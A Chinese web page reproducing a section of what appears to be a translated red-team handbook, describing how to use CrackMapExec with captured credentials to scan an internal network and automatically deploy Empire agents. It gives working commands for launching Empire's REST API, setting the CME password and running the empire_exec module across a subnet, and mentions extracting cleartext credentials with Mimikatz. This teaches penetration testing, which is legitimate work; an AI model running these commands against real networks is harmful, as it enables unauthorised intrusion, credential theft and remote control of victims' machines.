返回介绍

4.5 使用 CrackMapExec(CME)扫描网络

发布于 2024-10-13 11:41:07 字数 1016 浏览 0 评论 0 收藏 0

如果还没有突破的系统,但我们确实通过 Responder、配置错误的网络应用程序、暴力破解或打印机获得了凭证,那么可以尝试扫描网络,查看账户可以登录的位置。使用像 CrackMapExec(CME)等工具进行简单的扫描,可以帮助找到内部网络初始突破点。

从已经取得的效果看,我们使用 CME 扫描网络,识别/验证网络上的 SMB 资源,在多个主机上远程执行命令,甚至通过 Mimikatz 提取明文凭证。Empire 和 CME 提供新的功能,我们可以利用 Empire 的 REST 功能。在下面的场景中,我们将使用其 REST API 启动 Empire,在 CME 中配置密码,将 CME 连接到 Empire,使用掌握的单个凭证扫描网络,最后,如果通过身份鉴权,则自动推送 Empire 静荷到远程被攻击者的系统,如图 4.9 所示。如果您有帮助账户或特权账户,那么准备加载 Empire shells 吧!

0409

图 4.9

  • 启动 Empire 的 REST API 服务器。
    • cd /opt/Empire
    • ./empire --rest –password 'hacktheuniverse'
  • 更改 CrackMapExec 密码。
    • gedit /root/.cme/cme.conf
    • password=hacktheuniverse
  • 运行 CME,生成 Empire Shell。
    • cme smb 10.100.100.0/24 –d 'cyberspacekittens.local' –u '<username>' – p '<password>' - M empire_exec -o LISTENER = http

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据
    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文